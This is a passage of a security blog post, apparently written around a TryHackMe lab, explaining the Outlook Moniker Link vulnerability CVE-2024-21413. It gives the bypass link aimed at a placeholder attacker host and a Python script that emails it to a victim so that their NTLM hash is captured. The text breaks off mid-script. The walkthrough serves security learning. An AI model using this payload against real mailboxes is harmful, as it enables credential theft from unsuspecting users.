{"id":584,"date":"2024-03-03T13:49:04","date_gmt":"2024-03-03T19:49:04","guid":{"rendered":"https:\/\/blog.ishsome.com\/?p=584"},"modified":"2024-04-16T20:54:10","modified_gmt":"2024-04-17T01:54:10","slug":"moniker-link-cve-2024-21413","status":"publish","type":"post","link":"https:\/\/blog.ishsome.com\/index.php\/2024\/03\/03\/moniker-link-cve-2024-21413\/","title":{"rendered":"Moniker Link (CVE-2024-21413)"},"content":{"rendered":"\n<p>On February 13th, 2024, Microsoft announced a Microsoft Outlook RCE &amp; credential leak vulnerability with the assigned CVE of <a href=\"https:\/\/www.cve.org\/CVERecord?id=CVE-2024-21413\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">CVE-2024-21413<\/a> (Moniker Link). Haifei Li of Check Point Research is credited with <a href=\"https:\/\/research.checkpoint.com\/2024\/the-risks-of-the-monikerlink-bug-in-microsoft-outlook-and-the-big-picture\/\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">discovering the vulnerability<\/a>.<\/p>\n\n\n\n<p>The vulnerability bypasses Outlook&#8217;s security mechanisms when handing a specific type of hyperlink known as a Moniker Link. An attacker can abuse this by sending an email that contains a malicious Moniker Link to a victim, resulting in Outlook sending the user&#8217;s NTLM credentials to the attacker once the hyperlink is clicked.<\/p>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03af9019e61&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03af9019e61\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"162\" data-attachment-id=\"586\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/03\/03\/moniker-link-cve-2024-21413\/image-1-3\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-1.png?fit=1900%2C300&amp;ssl=1\" data-orig-size=\"1900,300\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image-1\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-1.png?fit=1024%2C162&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-1.png?resize=1024%2C162&#038;ssl=1\" alt=\"\" class=\"wp-image-586\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-1.png?resize=1024%2C162&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-1.png?resize=300%2C47&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-1.png?resize=768%2C121&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-1.png?resize=1536%2C243&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-1.png?w=1900&amp;ssl=1 1900w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<p>This blog is based on <a href=\"https:\/\/tryhackme.com\/room\/monikerlink\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">TryHackMe&#8217;s <\/a>free room on CVE-2024-21413.<\/p>\n\n\n\n<p>Details relating to the scoring of the vulnerability have been provided in the table below:<\/p>\n\n\n\n<div style=\"height:19px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-jetpack-markdown\"><table>\n<thead>\n<tr>\n<th><strong>CVSS<\/strong><\/th>\n<th><strong>Description<\/strong><\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>Publish date<\/td>\n<td>February 13th, 2024<\/td>\n<\/tr>\n<tr>\n<td>MS article<\/td>\n<td><a href=\"https:\/\/msrc.microsoft.com\/update-guide\/en-US\/vulnerability\/CVE-2024-21413\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">https:\/\/msrc.microsoft.com\/update-guide\/en-US\/vulnerability\/CVE-2024-21413<\/a><\/td>\n<\/tr>\n<tr>\n<td>Impact<\/td>\n<td>Remote Code Execution &amp; Credential Leak<\/td>\n<\/tr>\n<tr>\n<td>Severity<\/td>\n<td>Critical<\/td>\n<\/tr>\n<tr>\n<td>Attack Complexity<\/td>\n<td>Low<\/td>\n<\/tr>\n<tr>\n<td>Scoring<\/td>\n<td>9.8<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n\n\n\n<div style=\"height:22px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The vulnerability is known to affect the following Office releases:<\/p>\n\n\n\n<div style=\"height:24px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-jetpack-markdown\"><table>\n<thead>\n<tr>\n<th><strong>Release<\/strong><\/th>\n<th><strong>Version<\/strong><\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>Microsoft Office LTSC 2021<\/td>\n<td>affected from 19.0.0<\/td>\n<\/tr>\n<tr>\n<td>Microsoft 365 Apps for Enterprise<\/td>\n<td>affected from 16.0.1<\/td>\n<\/tr>\n<tr>\n<td>Microsoft Office 2019<\/td>\n<td>affected from 16.0.1<\/td>\n<\/tr>\n<tr>\n<td>Microsoft Office 2016<\/td>\n<td>affected from 16.0.0 before 16.0.5435.1001<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n<div class=\"wp-block-ub-table-of-contents-block ub_table-of-contents\" id=\"ub_table-of-contents-da341f6e-98bf-4e52-bb23-b41f61ec20b7\" data-linktodivider=\"false\" data-showtext=\"show\" data-hidetext=\"hide\" data-scrolltype=\"auto\" data-enablesmoothscroll=\"false\" data-initiallyhideonmobile=\"false\" data-initiallyshow=\"true\"><div class=\"ub_table-of-contents-header-container\" style=\"background-color: #000000; color: #fcb900; \">\n\t\t\t<div class=\"ub_table-of-contents-header\" style=\"text-align: left; \">\n\t\t\t\t<div class=\"ub_table-of-contents-title\" style=\"color: #fcb900; \">Table Of Contents<\/div>\n\t\t\t\t\n\t\t\t<\/div>\n\t\t<\/div><div class=\"ub_table-of-contents-extra-container\" style=\"background-color: #000000; \">\n\t\t\t<div class=\"ub_table-of-contents-container ub_table-of-contents-1-column \">\n\t\t\t\t<ul style=\"\"><li style=\"color: #ffffff; \"><a href=\"https:\/\/blog.ishsome.com\/index.php\/2024\/03\/03\/moniker-link-cve-2024-21413\/#0-moniker-link-cve-2024-21413-\" style=\"color: #fcb900; \">Moniker Link (CVE-2024-21413)<\/a><\/li><li style=\"color: #ffffff; \"><a href=\"https:\/\/blog.ishsome.com\/index.php\/2024\/03\/03\/moniker-link-cve-2024-21413\/#1-exploitation-\" style=\"color: #fcb900; \">Exploitation<\/a><\/li><li style=\"color: #ffffff; \"><a href=\"https:\/\/blog.ishsome.com\/index.php\/2024\/03\/03\/moniker-link-cve-2024-21413\/#2-detection-\" style=\"color: #fcb900; \">Detection<\/a><ul><li style=\"color: #ffffff; \"><a href=\"https:\/\/blog.ishsome.com\/index.php\/2024\/03\/03\/moniker-link-cve-2024-21413\/#3-yara-\" style=\"color: #fcb900; \">YARA<\/a><\/li><\/ul><\/li><li style=\"color: #ffffff; \"><a href=\"https:\/\/blog.ishsome.com\/index.php\/2024\/03\/03\/moniker-link-cve-2024-21413\/#4-remediation-\" style=\"color: #fcb900; \">Remediation<\/a><\/li><\/ul>\n\t\t\t<\/div>\n\t\t<\/div><\/div>\n\n\n<div style=\"height:23px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"0-moniker-link-cve-2024-21413-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Moniker Link (CVE-2024-21413)<\/mark><\/h2>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Outlook can render emails as HTML. You may notice this being used by your favourite newsletters. Additionally, Outlook can parse hyperlinks such as HTTP and HTTPS. However, it can also open URLs specifying applications known as <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/com\/url-monikers\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">Moniker Links<\/a>.&nbsp;Normally, Outlook will prompt a security warning when external applications are triggered.<\/p>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/research.checkpoint.com\/wp-content\/uploads\/2024\/02\/HBNP4GTD5Y-image1.png?ssl=1\" alt=\"Outlooks Protected View is triggered when launching an external application\"\/><\/figure>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>This pop-up is a result of Outlook&#8217;s &#8220;Protected View&#8221;. Protected View opens emails containing attachments, hyperlinks, and similar content in read-only mode, blocking things such as macros (especially from outside an organization).&nbsp;<\/p>\n\n\n\n<p>By using the <code>file:\/\/<\/code> Moniker Link in our hyperlink, we can instruct Outlook to attempt to access a file, such as a file on a network share. The SMB protocol is used, which involves using local credentials for authentication.&nbsp;However, Outlook&#8217;s &#8220;Protected View&#8221; catches and blocks this attempt.<\/p>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#282A36\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"&lt;p&gt;&lt;a href=&quot;file:\/\/ATTACKER_MACHINE\/test&quot;&gt;Click me&lt;\/a&gt;&lt;\/p&gt;\" style=\"color:#F8F8F2;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki dracula\" style=\"background-color: #282A36\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #F8F8F2\">&lt;<\/span><span style=\"color: #FF79C6\">p<\/span><span style=\"color: #F8F8F2\">&gt;&lt;<\/span><span style=\"color: #FF79C6\">a<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #50FA7B; font-style: italic\">href<\/span><span style=\"color: #FF79C6\">=<\/span><span style=\"color: #E9F284\">&quot;<\/span><span style=\"color: #F1FA8C\">file:\/\/ATTACKER_MACHINE\/test<\/span><span style=\"color: #E9F284\">&quot;<\/span><span style=\"color: #F8F8F2\">&gt;Click me&lt;\/<\/span><span style=\"color: #FF79C6\">a<\/span><span style=\"color: #F8F8F2\">&gt;&lt;\/<\/span><span style=\"color: #FF79C6\">p<\/span><span style=\"color: #F8F8F2\">&gt;<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:26px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The vulnerability here exists by modifying our hyperlink to include the <code>!<\/code> special character and some text in our Moniker Link which results in bypassing Outlook\u2019s Protected View. For example:<\/p>\n\n\n\n<div style=\"height:21px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#282A36\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"&lt;p&gt;&lt;a href=&quot;file:\/\/ATTACKER_MACHINE\/test!exploit&quot;&gt;Click me&lt;\/a&gt;&lt;\/p&gt;\" style=\"color:#F8F8F2;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki dracula\" style=\"background-color: #282A36\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #F8F8F2\">&lt;<\/span><span style=\"color: #FF79C6\">p<\/span><span style=\"color: #F8F8F2\">&gt;&lt;<\/span><span style=\"color: #FF79C6\">a<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #50FA7B; font-style: italic\">href<\/span><span style=\"color: #FF79C6\">=<\/span><span style=\"color: #E9F284\">&quot;<\/span><span style=\"color: #F1FA8C\">file:\/\/ATTACKER_MACHINE\/test!exploit<\/span><span style=\"color: #E9F284\">&quot;<\/span><span style=\"color: #F8F8F2\">&gt;Click me&lt;\/<\/span><span style=\"color: #FF79C6\">a<\/span><span style=\"color: #F8F8F2\">&gt;&lt;\/<\/span><span style=\"color: #FF79C6\">p<\/span><span style=\"color: #F8F8F2\">&gt;<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:21px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We, as attackers, can provide a Moniker Link of this nature for the attack. Remote Code Execution (RCE) is also possible because Moniker Links uses the Component Object Model (COM) on Windows.<\/p>\n\n\n\n<div style=\"height:22px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-jetpack-markdown\"><blockquote>\n<p>Note the share does not need to exist on the remote device, as an authentication attempt will be attempted regardless, leading to the victim\u2019s Windows netNTLMv2 hash being sent to the attacker.<\/p>\n<\/blockquote>\n<\/div>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"1-exploitation-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Exploitation<\/mark><\/h2>\n\n\n\n<div style=\"height:21px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>he objective, as the attacker, is to craft an email to the victim with a Moniker Link that bypasses Outlook&#8217;s &#8220;Protected View&#8221;, where the victim\u2019s client will attempt to load a file from our attacking machine, resulting in the victim\u2019s netNTLMv2&nbsp;hash being captured.<\/p>\n\n\n\n<p>But first, let\u2019s run through a PoC I have created (which is also available on <a href=\"https:\/\/github.com\/CMNatic\/CVE-2024-21413\" target=\"_blank\" rel=\"noreferrer noopener\">GitHub<\/a>).<\/p>\n\n\n\n<div style=\"height:24px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#272822\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"import smtplib\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\nfrom email.utils import formataddr\n\nsender_email = 'attacker@monikerlink.thm' # Replace with your sender email address\nreceiver_email = 'victim@monikerlink.thm' # Replace with the recipient email address\npassword = input(&quot;Enter your attacker email password: &quot;)\nhtml_content = &quot;&quot;&quot;\\\n&lt;!DOCTYPE html&gt;\n&lt;html lang=&quot;en&quot;&gt;\n    &lt;p&gt;&lt;a href=&quot;file:\/\/ATTACKER_MACHINE\/test!exploit&quot;&gt;Click me&lt;\/a&gt;&lt;\/p&gt;\n\n    &lt;\/body&gt;\n&lt;\/html&gt;&quot;&quot;&quot;\n\nmessage = MIMEMultipart()\nmessage['Subject'] = &quot;CVE-2024-21413&quot;\nmessage[&quot;From&quot;] = formataddr(('CMNatic', sender_email))\nmessage[&quot;To&quot;] = receiver_email\n\n# Convert the HTML string into bytes and attach it to the message object\nmsgHtml = MIMEText(html_content,'html')\nmessage.attach(msgHtml)\n\nserver = smtplib.SMTP('MAILSERVER', 25)\nserver.ehlo()\ntry:\n    server.login(sender_email, password)\nexcept Exception as err:\n    print(err)\n    exit(-1)\n\ntry:\n    server.sendmail(sender_email, [receiver_email], message.as_string())\n    print(&quot;\\n Email delivered&quot;)\nexcept Exception as error:\n    print(error)\nfinally:\n    server.quit()\" style=\"color:#F8F8F2;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki monokai\" style=\"background-color: #272822\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #F92672\">import<\/span><span style=\"color: #F8F8F2\"> smtplib<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F92672\">from<\/span><span style=\"color: #F8F8F2\"> email.mime.text <\/span><span style=\"color: #F92672\">import<\/span><span style=\"color: #F8F8F2\"> MIMEText<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F92672\">from<\/span><span style=\"color: #F8F8F2\"> email.mime.multipart <\/span><span style=\"color: #F92672\">import<\/span><span style=\"color: #F8F8F2\"> MIMEMultipart<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F92672\">from<\/span><span style=\"color: #F8F8F2\"> email.utils <\/span><span style=\"color: #F92672\">import<\/span><span style=\"color: #F8F8F2\"> formataddr<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">sender_email <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #E6DB74\">&#39;attacker@monikerlink.thm&#39;<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #88846F\"># Replace with your sender email address<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">receiver_email <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #E6DB74\">&#39;victim@monikerlink.thm&#39;<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #88846F\"># Replace with the recipient email address<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">password <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #66D9EF\">input<\/span><span style=\"color: #F8F8F2\">(<\/span><span style=\"color: #E6DB74\">&quot;Enter your attacker email password: &quot;<\/span><span style=\"color: #F8F8F2\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">html_content <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #E6DB74\">&quot;&quot;&quot;<\/span><span style=\"color: #AE81FF\">\\<\/span><\/span>\n<span class=\"line\"><span style=\"color: #E6DB74\">&lt;!DOCTYPE html&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #E6DB74\">&lt;html lang=&quot;en&quot;&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #E6DB74\">    &lt;p&gt;&lt;a href=&quot;file:\/\/ATTACKER_MACHINE\/test!exploit&quot;&gt;Click me&lt;\/a&gt;&lt;\/p&gt;<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #E6DB74\">    &lt;\/body&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #E6DB74\">&lt;\/html&gt;&quot;&quot;&quot;<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">message <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> MIMEMultipart()<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">message[<\/span><span style=\"color: #E6DB74\">&#39;Subject&#39;<\/span><span style=\"color: #F8F8F2\">] <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #E6DB74\">&quot;CVE-2024-21413&quot;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">message[<\/span><span style=\"color: #E6DB74\">&quot;From&quot;<\/span><span style=\"color: #F8F8F2\">] <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> formataddr((<\/span><span style=\"color: #E6DB74\">&#39;CMNatic&#39;<\/span><span style=\"color: #F8F8F2\">, sender_email))<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">message[<\/span><span style=\"color: #E6DB74\">&quot;To&quot;<\/span><span style=\"color: #F8F8F2\">] <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> receiver_email<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #88846F\"># Convert the HTML string into bytes and attach it to the message object<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">msgHtml <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> MIMEText(html_content,<\/span><span style=\"color: #E6DB74\">&#39;html&#39;<\/span><span style=\"color: #F8F8F2\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">message.attach(msgHtml)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">server <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> smtplib.SMTP(<\/span><span style=\"color: #E6DB74\">&#39;MAILSERVER&#39;<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #AE81FF\">25<\/span><span style=\"color: #F8F8F2\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">server.ehlo()<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F92672\">try<\/span><span style=\"color: #F8F8F2\">:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">    server.login(sender_email, password)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F92672\">except<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #66D9EF; font-style: italic\">Exception<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F92672\">as<\/span><span style=\"color: #F8F8F2\"> err:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">    <\/span><span style=\"color: #66D9EF\">print<\/span><span style=\"color: #F8F8F2\">(err)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">    <\/span><span style=\"color: #66D9EF\">exit<\/span><span style=\"color: #F8F8F2\">(<\/span><span style=\"color: #F92672\">-<\/span><span style=\"color: #AE81FF\">1<\/span><span style=\"color: #F8F8F2\">)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #F92672\">try<\/span><span style=\"color: #F8F8F2\">:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">    server.sendmail(sender_email, [receiver_email], message.as_string())<\/span><\/span>\n<span 